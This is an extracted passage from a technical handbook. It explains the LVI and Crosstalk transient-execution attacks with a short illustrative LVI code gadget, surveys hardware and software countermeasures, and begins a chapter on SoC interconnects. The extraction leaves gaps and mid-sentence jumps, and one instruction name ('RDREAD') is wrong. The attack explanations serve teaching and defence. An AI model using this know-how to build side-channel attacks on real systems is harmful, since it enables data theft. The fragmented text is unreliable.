instruction, while the reload is done after the transitive execution is discarded. (a) Data Bounce
occurs due to Condition 1. (b) Write transitive forwarding vulnerability occurs due to Condition 2
*arg_copy = untrusted_arg;
array[**trusted_ptr * 4096]; Dereferencing trusted_ptr creates a
} page fault. Store-to-load forwarding
under speculation causes untrusted_arg
to be passed to the trusted_ptr.
untrusted_arg is now the base
address for an array whose contents
can now be leaked.
Fig. 7 In LVI, the attacker injects a malicious value through load forwarding and uses that to leak
sensitive data
loading that in one of the micro-architectural buffers. (ii) The attacker then provokes
the victim into executing instructions that cause a page fault or exception which
triggers this store-to-load data poisoning. This can be done, for instance, by evicting
a set of victim’s virtual memory pages. (iii) Gadget-based secret transmission,
where the attacker finds exploitable code gadgets that can leak data under incorrect
transient execution behavior and lead the victim to that code gadget by carefully
poisoning the data.
5 Secure Processor Architectures 189
Crosstalk. Crosstalk demonstrates that MDS vulnerabilities exist beyond the CPU
core through a shared memory buffer, called staging buffer, that is shared across
multiple CPU cores. The authors identify several micro-instructions that touch the
buffer. These instructions, if executed transiently, can potentially lead to leakage
from one CPU core to another. One use case of Crosstalk is to leak hardware-
generated random numbers that uses Intel’s Secure Key Technology. The Secure
Key technology makes use of an off-core hardware random number generator. The
generator is initialized using the RDSEED instruction, and the random numbers are
read using the RDREAD instruction. These form the basis of several cryptographic
primitives including Intel’s security enclaves. Executing either of these instructions
touches the staging buffer. MDS attacks can be mounted on the buffer by transiently
executing RDRAND and RDSEED, thus leaking the seed or the random numbers
generated by the hardware random number generator.
Countermeasures
Since their discovery, there have been extensive efforts to design and develop
countermeasures for transient micro-architectural attacks. The countermeasures
can be broadly classified as prevention-based or detection-based. Prevention-
based solutions attempt to stop the attack by thwarting the execution at one of
the three phases (refer Fig. 3). Naïve preventive solutions, for instance, disable
speculative execution, thus preventing any transient execution, the first stage of
the attack. Another naïve preventive solution disables all timers, thus preventing
timing channels. This would disable stage 3, i.e., the transmission of leakage. In
contrast, detection-based solutions do not disable any feature; rather, they aim to
identify patterns in the program execution that can be attributed to an attack. While
preventive-based solutions have high overheads, detection-based solutions suffer
from false positives. Over the last few years, there have been multiple detection-
based and preventive-based solutions proposed. Table 2 provides a list of these
solutions. This section provides a description and analysis of some of these existing
solutions.
Prevention-Based Countermeasures
Figure 3 shows the stages of a transient attack. The attacker first identifies a source
of leakage, as listed in Table 1. The next step involves the transient movement
of data from the source to the medium of leakage. Finally, the attacker uses
techniques established in section “Micro-architectural Attacks” to transfer the secret
information from the medium. Thwarting any of these sequential stages is sufficient
to prevent the attack. Different preventive countermeasures target attacks at different
stages of their execution, as described in Table 2.
Prevention-based countermeasures provide a preemptive solution to these
attacks. While the goal of all solutions is to disable potentially vulnerable behavior
190
Table 2 Countermeasures for transient micro-architectural attacks are classified as either prevention-based or detection-based. While prevention-based
techniques aim to either modify or disable some functionality in the software or hardware, detection-based techniques rely on accurately identifying attacks
from their run-time characteristics (HW hardware implementation, SW software implementation)
Stage of Reported
applicability Paper HW or SW? Threat model overheads
–Prevention-based–
Source of leakage NDA (Weisse et al. 2019) HW Speculative execution attacks 4–32%
Context (Schwarz et al. 2020) Spectre-like 0–338%
InvisiSpec (Yan et al. 2019) Spectre-like 5–17%
Safespec (Khasawneh et al. 2019) Meltdown, Spectre-like 3%
SpectreGuard (Fustos et al. 2019) Spectre-like 8–20%
Specshield (Barber et al. 2019) Speculative execution attacks 21%
Spectrum (Gonzålez Abraham et al. 2018) Spectre-like 2%
MuonTrap (Ainsworth and Jones 2020) Spectre-like 4%
Invisible speculation (Sakalis et al. 2019) Cache and memory side channels 11%
Reversispec (Wu and Qian 2020) Speculative load attacks 8.3%
N. Singh et al.
Medium of leakage Random-fill (Liu and Lee 2014) HW Contention- and reuse-based attacks Negligible
Newcache (Liu et al. 2016) Contention- and reuse-based attacks Negligible
CEASER (Qureshi 2018) Contention-based attacks 1%
Encrypted-address cache (Qureshi 2019) Contention-based attacks 1%
Scattercache (Werner et al. 2019) Cache leakage techniques 2–4%
(section “Micro-architectural Attacks”)
DAWG (Kiriansky et al. 2018) Cache timing attacks 4–7%
SecDCP (Wang et al. 2016) Timing side channels 12.5%
MI6 (Bourgeat et al. 2019) Spectre-like 16.4%
Transmission of leakage Timewarp (Martin et al. 2012) HW Timing side channels Negligible
5 Secure Processor Architectures
InvarSpec (Zhao et al. 2020) SW Speculative execution attacks (Yan et al. 2019):
10.9%
oo7 (Wang et al. 2018) SW Spectre-like 5.9%
SPECCFI (Koruyeh et al. 2020) SW Spectre-like 1.9%
–Detection-based–
Transmission of leakage Cyclone (Harris et al. 2019) SW Cache leakage techniques 3.6%
(Chiappetta et al. 2016) Cache leakage techniques –
NIGHTs-WATCH (Mushtaq et al. 2018) Cache leakage techniques 2%
WHISPER (Mushtaq et al. 2020) Cache leakage techniques –
(Alam et al. 2021) Cache leakage techniques –
CloudRadar (Zhang et al. 2016) Cross VM attacks 5%
CacheShield (Briongos et al. 2018) Cross VM attacks –
191
192 N. Singh et al.
of programs, they differ in the attack phase they target. For example, a preventive
solution, called TimeWarp (Martin et al. 2012), fuzzes the timers in order to prevent
attackers from making fine-grained measurements. Such fine-grained measurements
are needed to distinguish between micro-architectural events like cache hits and
misses. Without precise time measurements, the third phase of the attack, namely,
the flush+reload, would fail. While most of these solutions are implemented in the
hardware, there are also proposals that work from the software (Koruyeh et al. 2020;
Wang et al. 2018; Yan et al. 2019).
cache lines cannot be evicted by other cache accesses not belonging to the private
partition. In the hardware, each cache line requires additional tags comprising of a
flag to indicate if the line is locked and an identifier to indicate the owner of the
cache line. The underutilization of Page’s partitioned cache still persists because
the locked lines cannot be used by other processes, even after the owner no longer
requires them.
In (2012), Domnitser et al. provide a low-cost solution to prevent attacks based
on the fact that the cipher evicts one or more lines of the spy data from the cache. The
solution, which requires minor modifications of the replacement policies in cache
memories, restricts an application from holding more than a pre-determined number
of lines in each set of a set-associative cache. With such a cache memory, the spy can
never hold all cache lines in the set; therefore, the probability that the cipher evicts
spy data is reduced. By controlling the number of lines that the spy can hold, a trade-
off between performance and security can be achieved. Over the years, several other
cache partitioning techniques have been suggested (Kiriansky et al. 2018; Sánchez
and Kozyrakis 2011) which strengthens the defense while improving usability.
Another well-known modification defense for cache-based attacks makes use of
randomization. Wang and Lee propose a random-permutation cache (RPCache)
in Wang and Lee (2007), whereas the name suggests, randomizes the cache
interference to make the attack more difficult. The design is based on the fact
that information is leaked only when cache interference is present between two
different processes. RPCache aims at randomizing such interferences so that no
useful information is gleaned. The architecture requires an additional hardware
called the permutation table, which maps the set bits in the effective address to
obtain new set bits. These are then used to index the cache set array. Changing the
contents of the permutation table will invalidate the respective lines in the cache.
This causes additional cache misses and randomization in the cache interference.
An advancement of random cache architectures is designs that encrypt the
mapping of addresses to cache sets. CEASER incorporates a block cipher (Qureshi
2018, 2019) for performing the encryption. The encryption key is periodically
changed to obtain a different mapping for the cache sets. An important aspect of
this design is the encryption algorithm, since it lies in the critical path and influences
the time for load and store operations. While traditional ciphers have considerable
latencies, ciphers designed specifically for this purpose may not provide sufficiently
strong encryption (Bodduna et al. 2020).
Detection-Based Countermeasures
Conclusions
The last few years have seen several variants of transient micro-architectural attacks.
The root cause in all these attacks is the unintended influence of speculatively
executed operations with the hardware. Given the complexity of modern micropro-
cessors, many new variants are likely to be discovered in the future. Next-generation
microprocessors should be designed to not just prevent known attacks but should
be resilient to future attacks as well. This would require security-aware design
methodologies that involve the following.
• While there have been several countermeasures proposed, most have been
evaluated in an ad hoc manner. This makes it difficult to quantitatively compare
countermeasures and gauge their effectiveness. There is an urgent need to
standardize evaluation for security in microprocessors. These standards would
provide methodologies to gauge the isolation between software entities, for
example, a methodology that can quantify how well the OS is isolated from
5 Secure Processor Architectures 195
References
Ainsworth S, Jones TM (2020) Muontrap: preventing cross-domain spectre-like attacks by
capturing speculative state. In: 47th ACM/IEEE annual international symposium on computer
architecture, ISCA 2020, Valencia, 30 May–3 June 2020. IEEE, pp 132–144
Alam M, Bhattacharya S, Mukhopadhyay D (2021) Victims can be saviors: a machine learning–
based detection for micro-architectural side-channel attacks. J Emerg Technol Comput Syst
17(2):1–31
Barber K, Bacha A, Zhou L, Zhang Y, Teodorescu R (2019) Specshield: shielding speculative
data from microarchitectural covert channels. In: 28th international conference on parallel
architectures and compilation techniques, PACT 2019, Seattle, 23–26 Sept 2019. IEEE, pp. 151–
164
Barresi A, Razavi K, Payer M, Gross TR (2015) CAIN: silently breaking ASLR in the cloud.
In: 9th USENIX workshop on offensive technologies, WOOT’15, Washington, DC, 10–11 Aug
2015
Bernstein DJ (2005) Cache-timing Attacks on AES
Bhatkar S, DuVarney DC, Sekar R (2003) Address obfuscation: an efficient approach to combat
a broad range of memory error exploits. In: Proceedings of the 12th USENIX security
symposium, Washington, DC, 4–8 Aug 2003. USENIX Association
Bhattacharyya A, Sandulescu A, Neugschwandtner M, Sorniotti A, Falsafi B, Payer M, Kurmus
A (2019) Smotherspectre: exploiting speculative execution through port contention. In:
Cavallaro L, Kinder J, Wang XF, Katz J (eds) Proceedings of the 2019 ACM SIGSAC
196 N. Singh et al.
conference on computer and communications security, CCS 2019, London, 11–15 Nov 2019.
ACM, pp 785–800
Bodduna R, Ganesan V, SLPSK P, Veezhinathan K, Rebeiro C (2020) Brutus: refuting the security
claims of the cache timing randomization countermeasure proposed in ceaser. IEEE Comput
Archit Lett 19(1):9–12
Bourgeat T, Lebedev I, Wright A, Zhang S, Arvind, Devadas S (2019) Mi6: secure enclaves in a
speculative out-of-order processor. In: Proceedings of the 52nd annual IEEE/ACM international
symposium on microarchitecture, MICRO’52, New York. Association for Computing Machin-
ery, pp 42–56
Briongos S, Irazoqui G, Malagón P, Eisenbarth T (2018) Cacheshield: detecting cache attacks
through self-observation. In: Zhao Z, Ahn G-J, Krishnan R, Ghinita G (eds) Proceedings of the
eighth ACM conference on data and application security and privacy, CODASPY 2018, Tempe,
19–21 Mar 2018. ACM, pp 224–235
Bulck JV, Minkin M, Weisse O, Genkin D, Kasikci B, Piessens F, Silberstein M, Wenisch TF,
Yarom Y, Strackx R (2018) Foreshadow: extracting the keys to the intel SGX kingdom with
transient out-of-order execution. In: Enck W, Felt AP (eds) 27th USENIX security symposium,
USENIX security 2018, Baltimore, 15–17 Aug 2018. USENIX Association, pp 991–1008
Bulck JV, Moghimi D, Schwarz M, Lipp M, Minkin M, Genkin D, Yarom Y, Sunar B, Gruss D,
Piessens F (2020) LVI: hijacking transient execution through microarchitectural load value
injection. In: 2020 IEEE symposium on security and privacy, SP 2020, San Francisco, 18–21
May 2020. IEEE, pp 54–72
Canella C, Genkin D, Giner L, Gruss D, Lipp M, Minkin M, Moghimi D, Piessens F, Schwarz
M, Sunar B, Bulck JV, Yarom Y (2019) Fallout: leaking data on meltdown-resistant cpus.
In: Cavallaro L, Kinder J, Wang XF, Katz J (eds) Proceedings of the 2019 ACM SIGSAC
conference on computer and communications security, CCS 2019, London, 11–15 Nov 2019.
ACM, pp 769–784
Chen G, Chen S, Xiao Y, Zhang Y, Lin Z, Lai T-H (2020) Sgxpectre: stealing intel secrets from
SGX enclaves via speculative execution. IEEE Secur Priv 18(3):28–37
Chiappetta M, Savas E, Yilmaz C (2016) Real time detection of cache-based side-channel attacks
using hardware performance counters. Appl Softw Comput 49(C):1162–1174
Delshadtehrani L, Canakci S, Zhou B, Eldridge S, Joshi A, Egele M (2020) Phmon: a
programmable hardware monitor and its security use cases. In: Capkun S, Roesner F (eds) 29th
USENIX security symposium, USENIX security 2020, 12–14 Aug 2020. USENIX Association,
pp 807–824
Demme J, Maycock M, Schmitz J, Tang A, Waksman A, Sethumadhavan S, Stolfo S (2013) On the
feasibility of online malware detection with performance counters. In: Proceedings of the 40th
annual international symposium on computer architecture, ISCA’13, New York. Association for
Computing Machinery, pp 559–570
Dhavlle A, Mehta R, Rafatirad S, Homayoun H, Dinakarrao SMP (2020) Entropy-shield: side-
channel entropy maximization for timing-based side-channel attacks. In: 21st international
symposium on quality electronic design, ISQED 2020, Santa Clara, 25–26 Mar 2020. IEEE,
pp 161–166
Domnitser L, Jaleel A, Loew J, Abu-Ghazaleh NB, Ponomarev D (2012) Non-monopolizable
caches: low-complexity mitigation of cache side-channel attacks. TACO 8(4):35
Fustos J, Farshchi F, Yun H (2019) Spectreguard: an efficient data-centric defense mechanism
against spectre attacks. In: Proceedings of the 56th annual design automation conference 2019,
DAC 2019, Las Vegas, 02–06 June 2019. ACM, p 61
Gonzålez Abraham EY, Korpan B, Zhao J (2018) Spectrum: classifying , replicating and mitigating
spectre attacks on a speculating risc-v microarchitecture. https://people.eecs.berkeley.edu/~
kubitron/courses/cs262a-F18/projects/reports/project4_report.pdf. Accessed: 4 Apr 2021
Gras B, Razavi K, Bosman E, Bos H, Giuffrida C (2017) ASLR on the line: practical cache attacks
on the MMU. In: 24th annual network and distributed system security symposium, NDSS 2017,
San Diego, 26 Feb–1 Mar 2017
5 Secure Processor Architectures 197
Harris A, Wei S, Sahu P, Kumar P, Austin TM, Tiwari M (2019) Cyclone: detecting contention-
based cache information leaks through cyclic interference. In: Proceedings of the 52nd annual
IEEE/ACM international symposium on microarchitecture, MICRO 2019, Columbus, 12–16
Oct 2019. ACM, pp 57–72
Hund R, Willems C, Holz T (2013) Practical timing side channel attacks against kernel space
ASLR. In: Proceedings of the 2013 IEEE symposium on security and privacy, SP’13. IEEE
Computer Society, pp 191–205
Institute of Applied Information Processing and Communications (IAIK). Meltdown Proof-of-
Concept. https://github.com/IAIK/meltdown. Accessed: 2 Mar 2021
Institute of Applied Information Processing and Communications (IAIK). ZombieLoad PoC.
https://github.com/IAIK/ZombieLoad, Accessed: 2 Mar 2021
Intel. Intel C++ Compiler Classic Developer Guide and Reference. https://software.intel.com/
content/dam/develop/external/documents/cpp_compiler_classic.pdf. Accessed: 3 Feb 2021
Intel Corporation (2021) 11th Generation Intel Core Processor Desktop Datasheet, Volume 1,
Revision 003. https://cdrdv2.intel.com/v1/dl/getContent/634648. Accessed: 2 June 2022
Intel Corporation (2022) 12th Generation Intel Core Processor Desktop Datasheet, Volume 1,
Revision 004. https://cdrdv2.intel.com/v1/dl/getContent/655258. Accessed: 2 June 2022
Khasawneh KN, Koruyeh EM, Song C, Evtyushkin D, Ponomarev D, Abu-Ghazaleh N (2019)
Safespec: banishing the spectre of a meltdown with leakage-free speculation. In: Proceedings
of the 56th annual design automation conference 2019, DAC’19, New York. Association for
Computing Machinery
Kiriansky V, Lebedev IA, Amarasinghe SP, Devadas S, Emer JS (2018) DAWG: a defense
against cache timing attacks in speculative execution processors. In: 51st annual IEEE/ACM
international symposium on microarchitecture, MICRO 2018, Fukuoka, 20–24 Oct 2018. IEEE
Computer Society, pp 974–987
Kocher P, Horn J, Fogh A, Genkin D, Gruss D, Haas W, Hamburg M, Lipp M, Mangard S, Prescher
T, Schwarz M, Yarom Y (2019) Spectre attacks: exploiting speculative execution. In: 2019
IEEE symposium on security and privacy, SP 2019, San Francisco, 19–23 May 2019. IEEE,
pp 1–19
Koruyeh EM, Khasawneh KN, Song C, Abu-Ghazaleh NB (2018) Spectre returns! speculation
attacks using the return stack buffer. In: Rossow C, Younan Y (eds) 12th USENIX workshop
on offensive technologies, WOOT 2018, Baltimore, 13–14 Aug 2018. USENIX Association
Koruyeh EM, Shirazi SHA, Khasawneh KN, Song C, Abu-Ghazaleh NB (2020) Speccfi: mitigating
spectre attacks using CFI informed speculation. In: 2020 IEEE symposium on security and
privacy, SP 2020, San Francisco, 18–21 May 2020. IEEE, pp 39–53
Li C, Gaudiot J-L (2019) Detecting malicious attacks exploiting hardware vulnerabilities using
performance counters. In: Getov V, Gaudiot J-L, Yamai N, Cimato S, Chang JM, Teranishi Y,
Yang J-J, Leong HV, Shahriar H, Takemoto M, Towey D, Takakura H, Elçi A, Takeuchi S, Puri
S (eds) 43rd IEEE annual computer software and applications conference, COMPSAC 2019,
Milwaukee, 15–19 July 2019, vol 1. IEEE, pp 588–597
Lipp M, Schwarz M, Gruss D, Prescher T, Haas W, Fogh A, Horn J, Mangard S, Kocher P, Genkin
D, Yarom Y, Hamburg M (2018) Meltdown: reading kernel memory from user space. In: Enck
W, Felt AP (eds) 27th USENIX security symposium, USENIX security 2018, Baltimore, 15–17
Aug 2018. USENIX Association, pp 973–990
Liu F, Lee RB (2014) Random fill cache architecture. In: 47th annual IEEE/ACM international
symposium on microarchitecture, MICRO 2014, Cambridge, 13–17 Dec 2014. IEEE Computer
Society, pp 203–215
Liu F, Wu H, Mai K, Lee RB (2016) Newcache: secure cache architecture thwarting cache side-
channel attacks. IEEE Micro 36(5):8–16
Maisuradze G, Rossow C (2018) ret2spec: speculative execution using return stack buffers. In: Lie
D, Mannan M, Backes M, Wang XF (eds) Proceedings of the 2018 ACM SIGSAC conference on
computer and communications security, CCS 2018, Toronto, 15–19 Oct 2018. ACM, pp 2109–
2122
198 N. Singh et al.
Wang Z, Lee RB (2007) New cache designs for thwarting software cache-based side channel
attacks. In: Tullsen DM, Calder B (eds) ISCA. ACM, pp 494–505
Wang G, Chattopadhyay S, Gotovchits I, Mitra T, Roychoudhury A (2018) oo7: low-overhead
defense against spectre attacks via binary analysis. ArXiv, abs/1807.05843
Wang Y, Ferraiuolo A, Zhang D, Myers AC, Edward Suh G (2016) SecDCP: secure dynamic cache
partitioning for efficient timing channel protection. In: Proceedings of the 53rd annual design
automation conference, DAC 2016, Austin, 5–9 June 2016. ACM, pp 74:1–74:6
Weisse O, Van Bulck J, Minkin M, Genkin D, Kasikci B, Piessens F, Silberstein M, Strackx R,
Wenisch TF, Yarom Y (2018) Foreshadow-NG: breaking the virtual memory abstraction with
transient out-of-order execution. Technical report
Weisse O, Neal I, Loughlin K, Wenisch TF, Kasikci B (2019) NDA: preventing speculative
execution attacks at their source. In: Proceedings of the 52nd annual IEEE/ACM international
symposium on microarchitecture, MICRO’52, New York. Association for Computing Machin-
ery, pp 572–586
Werner M, Unterluggauer T, Giner L, Schwarz M, Gruss D, Mangard S (2019) Scattercache:
thwarting cache attacks via cache set randomization. In: Heninger N, Traynor P (eds) 28th
USENIX security symposium, USENIX security 2019, Santa Clara, 14–16 Aug 2019. USENIX
Association, pp 675–692
Wu Y, Qian X (2020) Reversispec: reversible coherence protocol for defending transient attacks.
CoRR, abs/2006.16535
Xu J, Kalbarczyk Z, Iyer RK (2003) Transparent runtime randomization for security. In:
22nd symposium on reliable distributed systems (SRDS 2003), Florence, 6–8 Oct 2003. IEEE
Computer Society, p 260
Yan M, Choi J, Skarlatos D, Morrison A, Fletcher CW, Torrellas J (2019) Invisispec: making spec-
ulative execution invisible in the cache hierarchy (corrigendum). In: Proceedings of the 52nd
annual IEEE/ACM international symposium on microarchitecture, MICRO 2019, Columbus,
12–16 Oct 2019. ACM, p 1076
Zhang T, Zhang Y, Lee RB (2016) Cloudradar: a real-time side-channel attack detection system in
clouds. In: Monrose F, Dacier M, Blanc G, García-Alfaro J (eds) Research in attacks, intrusions,
and defenses – 19th international symposium, RAID 2016, Paris, 19–21 Sept 2016, Proceedings.
Lecture notes in computer science, vol 9854. Springer, pp 118–140
Zhao ZN, Ji H, Yan M, Yu J, Fletcher CW, Morrison A, Marinov D, Torrellas J (2020)
Speculation invariance (invarspec): faster safe execution through program analysis. In: 53rd
annual IEEE/ACM international symposium on microarchitecture, MICRO 2020, Athens, 17–
21 Oct 2020. IEEE, pp 1138–1152
Bus and Memory Architectures
6
Trevor E. Carlson
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202
SoC Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202
Processor Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Accelerators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208
On-Chip Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Interconnect Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Interconnect Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Off-Chip Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Summary and Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Abstract
Keywords
T. E. Carlson ()
Department of Computer Science, National University of Singapore, Singapore, Singapore
e-mail: [email protected]
Introduction
Systems-on-Chip (SoCs) are the heart of many digital devices today. From mobile
phones to TVs and smart watches to datacenter servers, most are made up of a vari-
ety of processors and accelerators connected through a variety of interconnection
networks.
Connectivity is the heart of any SoC built today. These systems tend to require a
collection of specialized components to handle different tasks, from external device
connectivity (like display controllers, networking, and device controllers), as well
as internal computation, storage, and communication (such as between compute
units like CPUs (Central Processing Units), GPUs (Graphics Processing Units), and
various other accelerators and internal controllers in a system). But, in addition to
simple communication, there can also be isolation mechanisms for both security
(ARM TrustZone ARM 2024) and performance (Bus isolation).
CPU cores, accelerators, and other peripherals of a system do not purely stand-
alone but require interaction with other components of the system. Interestingly,
one of the principles of optimization of circuits, architectures, and systems has been
to reduce waste through reuse. While I can duplicate an entire processor or even a
component of that processor, is there an opportunity to optimize the system if I could
time-multiplex when I use those resources? This is one example of how I reduce the
amount of silicon area, power, and energy used by a system. And, by optimizing the
system on multiple levels, from the transistor design up to the workloads that run on
the processors, it is possible to build a system that can be affordable, long-running,
and efficient.
It is these very trade-offs that I will explore in this chapter. I will discuss some
fundamental aspects of processor design and latency hiding methods (where the
processors themselves can handle any delay caused by trade-offs made at design
time). In addition to a high-level overview of the processors themselves, I will take
a deep dive into SoC interconnects. The goal is to better understand how to connect
various subsystems together.
SoC Overview
Today’s processor designs consist of a large number of components, from the core
CPU itself to accelerators like GPUs, NPUs, and various other designs. Many
systems, especially embedded or power-constrained systems, build in workload-
specific accelerators in ASIC form that can be used to accelerate data processing.
In fact, many modern processors have been projected to contain more than 40
individual accelerators helping with a variety of tasks from decompressing audio
to compressing movies for local storage (Shao and Wang 2019).
As all components connect together on the SoC, there are a number of main
components that connect to the system itself. On-chip networks are used to connect
components to one another on the system. Depending on connectivity requirements
6 Bus and Memory Architectures 203
Table 1 A list of the number of common digital components found in modern System-on-Chip
(SoC) systems
Component Type Description
CPU Compute Latency and branch-heavy process-
ing
GPGPU Compute Throughput processing on GPUs,
image processing
NPU (Neural Processing Compute AI-specific acceleration
Unit)
*PU (accelerators) Compute Fixed-function accelerators, like
audio and video encoders and
decoders
(Hierarchical) Bus inter- Communication One-to-all communication
connects
Network-on-chip Communication Flexible communication
On-chip memory Cache hierarchy Provides improved average latency
(scratchpads) and caches by taking into account spatial and
temporal locality
DDR interface Off-chip communication Off-chip DRAM communication
Peripheral interfaces Off-chip communication Various interfaces like HDMI,
USB, and “Ethernet”
Processor Overview
CPU Types
There are a variety of CPU types that exist (see Table 2), as mentioned in the
previous section. Each processor type comes with a variety of trade-offs that sees
various performance numbers, area, power, and energy-efficiency results and also
results in differences in development and validation and verification time.
For extremely low-power and low-energy designs, in-order processors are typi-
cally used to control the system in an extremely lightweight way. These processors
tend to be quite small (and vary in size from the extremely small nW-scale to larger
mW-scale processor designs like the ARM Cortex-A520.
6 Bus and Memory Architectures 205
Table 2 A list of popular CPU types by category. Higher performance designs tend to be less
efficient, while restricted out-of-order machines tend to be the most energy-efficient overall
(although they are still limited in performance compared to purely out-of-order processors).
In modern systems, from ARM’s big.LITTLE to Intel’s Efficiency and Performance cores, the
complexity and efficiency of out-of-order processors can vary significantly
Processor type Efficiency Performance
In-order
Restricted out-of-order (slice-order)
Out-of-order
On the low end, processors tend to prioritize energy efficiency or area, which
relate to power supply requirements or costs, respectively. For example, energy-
harvesting devices that use solar power, or even electromagnetic, thermal, or
vibrational energy, have very strict power and energy requirements and prioritize
these requirements over others.
As performance becomes a concern, systems tend to focus on energy-efficiency
and dark-silicon-compatible (Esmaeilzadeh et al. 2011) techniques to maximize
power consumption given the limits seen by the physical device limits. Due to
the end of Dennard Scaling (Dennard et al. 1974), the additional transistors that
I typically could use for additional compute can no longer be enabled or turned on
simultaneously. This has led to the need for multicore processor designs and DVFS
techniques like Intel’s Turbo-Boost that can allow a single processor to use a larger
percentage of the overall power budget of a processor.
But, in the quest to deploy systems with continued performance improvement,
CPU designers have looked to a number of performance techniques, including
MLP (Glew 1998) and additional speculation in the processors in general.
and Smith 2007), the architect can design a system that, for the most important
workloads, will not see any one structure or hardware component become the
limiting factor of the system. By building a balanced microarchitecture, the resulting
CPU will allow for high performance but will also not unnecessarily waste silicon
area and energy for unneeded structures. By building balanced processor microar-
chitecture, the design can meet high performance requirements while maintaining
efficiency.
MSHRs
MSHRs (Kroft 1981) are an important feature of caches that allow the destination
of outstanding load instructions to be paired with a destination location. While the
cache is waiting for the data to return, a pointer to the storage location is held in the
MSHR. Once the data returns, the cache can look up the target destination (e.g., for
an L1 data cache, the destination will be a register entry in the CPU) and direct the
data to be stored there. Finally, the CPU uses this response as an action to eventually
issue instructions that have all of their operands ready.
Apart from the L1 data cache, all caches that support a number of outstanding
misses use MSHRs, including instruction caches and the caches contained in the
6 Bus and Memory Architectures 207
cache hierarchy (where modern processors can have many layers of caching, ending
with the LLC, or last-level cache that will finally communicate with off-chip
memory via the memory controller to request the data needed).
For a balanced CPU microarchitecture (see section “Balanced Processor Archi-
tectures”), one will size the MSHR appropriately for the system design at hand. For
example, high-end in-order and low-end out-of-order processors might only have
four MSHR entries in their L1 data caches. As these processors do not expose a
significant amount of parallelism, a small number of MSHRs is adequate for most
applications. Nevertheless, for high-end out-of-order processors, they can expose a
significant amount of parallelism and tend to require 20 or more MSHRs per core.
hierarchy. Many in-order and restricted out-of-order processors are unable to hide
the latencies imposed by the cache hierarchy, leading to additional processor stalls
that are not seen on the larger, more complex, and less efficient designs. Improving
MHP for these lightweight processors can help increase throughput due to the
overlapping nature of the accesses to on-chip caches (Carlson et al. 2015).
Parallelism to DRAM
Being able to access off-chip memory in a fast, high-bandwidth method is key
for processors to be able to sustain high performance. The DRAM subsystem is
optimized for high-bandwidth workloads, where the workloads access data in a
serial manner. The DRAM structures are designed to allow for the hiding of the
DRAM page activation latency and demonstrate continuous streaming of data from
contiguous memory addresses. As data is streamed, a sufficiently fast CPU will be
able to transfer data at the maximum rate to DRAM, which on modern machines
can exceed 250 GiB/s.
MLP is enabled by the ability of the DRAM subsystem to allow accesses to
different parts of the DRAM chips at a time. To handle this, DRAM is composed of
banks that can handle independent requests for data. If that data is distributed across
the DRAM subsystem, then there is a high chance that data accesses will need data
from an unused bank. As this bank can access data independently from other banks,
the accesses that do not arrive on the same bank can exhibit MLP.
Accelerators
Accelerators make up a huge portion of chips today (Shao and Wang 2019). Orig-
inally, processor designs featured a single CPU core, with basic I/O connectivity
and memory (DRAM) connectivity. But, a number of factors have led to changes
in how processors are designed, including the addition of multiple CPU cores and a
multitude of accelerators.
The prospect of key limitations on processor performance in recent years has pre-
vented the continued performance improvements seen in CPUs. The issue of Dark
Silicon (Esmaeilzadeh et al. 2011), where the ending of Dennard Scaling (Dennard
et al. 1974) prevented the use of large numbers of transistors at the same time, would
lead to a requirement where only a part of the transistors on a processor could
be used at once. While Moore’s Law (Moore 2006) allowed for a large number
of additional transistors in the same space, the power requirements to use all of
these transistors at the same time were no longer possible. At this point, higher
performance needed to come along with higher efficiency – leading to the broad use
of specialization (in the form of accelerators), as well as more efficient cores (the use
of multicore and manycore processors which swap larger inefficient cores for many
smaller more efficient ones) and the use of new techniques like TurboBoost (Intel
Corporation 2024b) to continue to improve processor performance (TurboBoost,
and similar solutions, increases the power output of a single processor of a multicore
6 Bus and Memory Architectures 209
chip when other processors are not in use, effectively allocating power to the core
in use.).
Acceleration (and specialization) has occurred along many fronts, with fixed-
function accelerators (audio and video encoders are a good example of this)
becoming commonplace in many designs. Off-chip accelerators (like GPUs) were
the first to emerge, but on-chip acceleration quickly became dominant due to the
cost savings and increased bandwidth and lower latencies of on-chip solutions.
Today, mobile phone processor designs consist of a variety of accelerators and more
general-purpose accelerators, from the original CPUs, GPUs, and a large number
of accelerators (Shao and Wang 2019). Even CPUs have continued to specialize,
increasing both performance and efficiency with SIMD, security (AES), matrix/DSP
acceleration (AMX), and AI acceleration.
Together, these complex systems have a large number of discrete accelerators
that need to be connected to one another in an efficient way. In the next sections,
I will discuss a number of interconnect methodologies that have been developed to
allow for connecting diverse components in standardized ways.
On-Chip Connectivity
Interconnect Interfaces
interface supports a number of data bit widths (from 8 bits to 64 bits), as well
as multiple initiators (requesting processor) and target (destination) peripherals
that can exist on a single system bus. This bus design not only has support for
bidirectional data transfers across a data bus but also includes optional support for
many signals, like write-enable, or even the data request address. While the typical
usage for an interface like this is to connect a processor to a memory, other uses
like a lightweight, address-less FIFO communication protocol are also supported.
The Wishbone standard also defines a protocol used for communication to initiate
single data transfers, burst data transfers, read–modify–write updates, and a number
of other options. The protocol allows for the ability to request a retry by the target
or even to optionally support returning error results.
